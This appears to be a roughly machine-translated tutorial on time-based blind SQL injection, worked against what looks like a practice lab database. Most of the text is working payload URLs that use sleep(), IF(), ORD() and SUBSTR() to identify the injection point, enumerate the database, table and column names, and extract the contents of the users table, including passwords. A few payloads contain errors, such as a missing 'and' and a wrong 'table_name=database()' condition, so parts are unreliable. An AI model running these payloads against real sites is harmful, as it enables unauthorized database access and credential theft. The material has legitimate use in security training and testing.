#time blind
Time Blinds:
The web interface will just return a normal interface. Use the different page response times to gradually guess whether there is an injection point in the data.
scenes to be used:
1. The interface does not echo
2. There is no error message in the interface
3. The interface has no true and false values
For example: if a page has an echo, we give priority to union injection. If there is no echo, but there is an error message, we use error injection (extracvalue, floor, updatexml, etc.). If there is no echo or error message, but his page has two switching states of true value and false value, we can choose Boolean blind injection according to the feedback results of the code we input. If none of the above, time injection can be used
#Key function introduction
1.Sleep()
The Sleep() parameter is the sleep time in seconds, which can be a decimal
First write the parameter?id=1
normal page
Write a random mess in the back, the page is still normal
It is normal no matter how you write. Generally, in the actual situation, you use various closed judgments or other judgments, and other pages are normal no matter what.
At this time, we don't know whether he has injection points, so we can only try one by one.
Numeric try using sleep()
url:id=1 and sleep(5)
Assuming that it is digital, then we will use the function and sleep(5) first. If the time it takes to return the page is the page loaded after 5 seconds, then it proves that it is digital, and it is injected again, because He did what we typed.
It can be seen from the interface that he did not return the result after 5 seconds delay.
Use sleep() for char try
string first " try
url:id=1" and sleep(5) --+
no delay
string second ' try
url:?id=1' and sleep(5) --+
The page returned in 6038 milliseconds
1000 milliseconds of our own internet speed
After a delay of 5 seconds, it is determined that there is an injection point
It means that we entered the statement and he executed it, so as to judge the existence of SQL injection point
2.IF() function
IF(condition, ture, false): condition is the condition, ture is the value returned when the condition is true, and false is the value returned when the condition is false
Select if(1,2,3);select if(1=1,sleep(0),sleep(3)); 如果1=1这个条件为真的话,那么就执行sleep(0)。如果1=1为假的话那么就执行sleep(3)
First of all, the first parameter is comparing the size. It turns out that in our Boolean blind injection, we use the method of comparing the size to compare the two switching states of the true and false values of the page to judge whether our conditions are true. So now we can only use
The response time of the sleep() functionis used to judge whether our conditions are true.
#case demo
1. Determine whether it is a number or a character. If it is a character, determine the closing method and determine whether there is an injection point
play load :
and sleep(5);
url:?id=1' and sleep(5) --+
After a delay of 5 seconds, it is determined that there is an injection point
Use ' single quotes to close
2. Determine the length of the database name
play load
and if(length(database())>=10,sleep(0),sleep(3))
use function
length(): length
database(): The database being used
url:?id=1' and if(length(database())>=10,sleep(0),sleep(3)) --+
Determine whether the length of the database is greater than or waiting for 10 characters. If it is greater than 0 seconds, the result will be returned. If it is not greater than 10 characters, the result will be returned after 3 seconds.
Page situation, paused for 3 seconds, indicating that it is less than 10, then indicating that its data name is within 10 characters
Url:
?id=1’ if(length(database())=8,sleep(0),sleep(3)) --+
The page echo time is 1031 seconds, there is no delay to confirm that the data name is 8 characters
3. Determine the database name
play load
and if(Ord(Substr(database(),1,1))>=x,sleep(0),sleep(3))
use function
if(1,2,3): Judgment statement, 1 is the condition, if the condition is true, execute the parameter of 2. If 1 is false execute the parameter of 3
ord(): Convert the content in brackets into ascii code
substr(s,n,1) intercepts the string s, starts from the position of n, and captures the length of one character
Determine the first character of the database name
url:?id=1' and if(ord(substr(database(),1,1))>=100,sleep(0),sleep(3)) --+
Intercept the first character of the database name and judge whether it is greater than 100. If it is greater than 100, the page will pause for 0 seconds and return to the page
Determined by page load time greater than 100
Determined by page load time greater than 110
.......
Determined by the page time, the ascii code value of the first character is 115
Compared with code table
115=s
The above conclusion a character is s
Determines the second character of the database name
?id=1' and if(ord(substr(database(),2,1))=101,sleep(0),sleep(3))--+
Through the judgment of time, it is determined that the ascii code of the second character is 101
Compared with code table
101=e
The two characters of the above conclusion are e
....... Try the following content yourself, just change the second parameter of substr()
Finalize the database name as security
4. Obtain data table information
4.1 Get the string length of all data table names concatenated
play load
and if(length((select group_concat(table_name)from information_schema.tables where table_schema=database()))>=x,sleep(0),sleep(3))
url:
?id=1'and if(length((select group_concat(table_name)from 20 information_schema.tables where table_schema=database()))=29,sleep(0),sleep(3)) --+
Determine whether the string length of the concatenated data table name is 29
According to the time response judgment, the data name table name is determined to be 29 characters
4.2 Guess every character of the data table name string
play load
and if(ord(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),n,1))>=100,sleep(0),sleep(3))
Query the first character of the data table
url:
?id=1'and if(ord(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),1,1))>=110,sleep(0),sleep(3))--+
Determine whether the first character of the data table is greater than 110
Determined by the response time, not greater than 110
url:
?id=1'and if(ord(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),1,1))>=100,sleep(0),sleep(3))--+
Determine whether the first character of the data table name is greater than 100
It is determined by the time difference of the page response that it is greater than 100 and less than 110, so it means that it is between 100-110
url:
?id=1'and if(ord(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),1,1))=101,sleep(0),sleep(3))--+
Through the time response, determine the ascii value of the first character of the data table name to be 101
Query through the ascii code table
101 converts the result to e
Make sure the first character in the data table is e
Query the second character of the data table
?id=1' and if(ord(substr((select group_concat(table_name)from information_schema.tables where table_name=database()),2,1))>100,sleep(0),sleep(3)) --+
Determine whether the second character of the data table is greater than 100
Judging by the time difference, it is greater than 100
url:
?id=1' and if(ord(substr((select group_concat(table_name)from information_schema.tables where table_name=database()),2,1))>=110,sleep(0),sleep(3)) --+
Judging by the response time is not greater than 110
Make sure the second character is between 100-110
Test one by one from 100-110
url:
?id=1'and if(ord(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),2,1))=109,sleep(0),sleep(3))--+
Through the time response, determine the ascii value of the first character of the data table name to be 109
Query through the ascii code table
109 conversion result is m
Make sure the second character of the data table is m
....................
The same steps, just replace the second parameter of substr()
All the final data tables are
emails,
referers,
uagents,
users
5. Query all field information in the users data table
5.1 Get the length of the string of all field names concatenated
play load
and if(length((select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='users'))>=n,sleep(0),sleep(3))
url:
?id=1' and if(length((select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='users'))>=20,sleep(0),sleep(3)) --+
Determine whether the concatenated field name is greater than 20 characters
Frequently check and judge the time of the page, and confirm that it is greater than 20 characters
url:
?id=1' and if(length((select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='users'))>=30,sleep(0),sleep(3)) --+
Judging by the page time response, the number of characters is not greater than 30
It is estimated that the field name is between 20-30 characters
url:
?id=1' and if(length((select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='users'))=20,sleep(0),sleep(3)) --+
Judging by the page time difference, determine that the field length is 20 strings
5.2 Judging the spliced field characters (guess each character of the string formed by the fields spliced)
paly load
and if(ord(substr((select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='数据表'),n,1))>=x,sleep(0),sleep(3))
?id=1'and if(ord(substr((select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='users'),1,1))>=110,sleep(0),sleep(3)) --+
Determine whether the first character of the concatenated field name is greater than 110
Judging by the page time difference, not greater than 110
url:
?id=1'and if(ord(substr((select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='users'),1,1))>=100,sleep(0),sleep(3)) --+
Judging by the page time difference, the first character is greater than 100 but less than 110
Between 100-110
url:
?id=1'and if(ord(substr((select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='users'),1,1))=105,sleep(0),sleep(3)) --+
Judging by the time response that the first character is 105
Compare by code table
105=i
............
The same test method is the same later, just change the second parameter of substr(1,2,3)
Below are all fields
id,
username,
password
6. Drag library
1. Determine the length of the field (get the total length of the username and password fields concatenated into a string)
play load
?id=1'and if(LENGTH((SELECT GROUP_CONCAT(field 1,'--',p field 2) FROM database.data table))>=x,sleep(0),sleep(3))
?id=1'and if(LENGTH((SELECT GROUP_CONCAT(username,'--',password) FROM security.users))=201,sleep(0),sleep(3))--+
The basic response time is determined, and the length of the field information by virtue of the field length is 201 characters
2. Guess each character of the data in the field name
play load
and if( ORD(SUBSTR((SELECT GROUP_CONCAT(field 1,'--',field) from database.data table),n,1))>=x,sleep(0),sleep(3))
?id=1'and if( ORD(SUBSTR((SELECT GROUP_CONCAT(username,'--',password) from security.users),1,1))=68,sleep(0),sleep(3))--+
Judging from the response time, the ascii code of the first character is 68
68=D
.................................................................
The following is how to judge, there are too many goodbyes, I don’t want to test, if there is a baby who is too curious, go to sqlmap to run
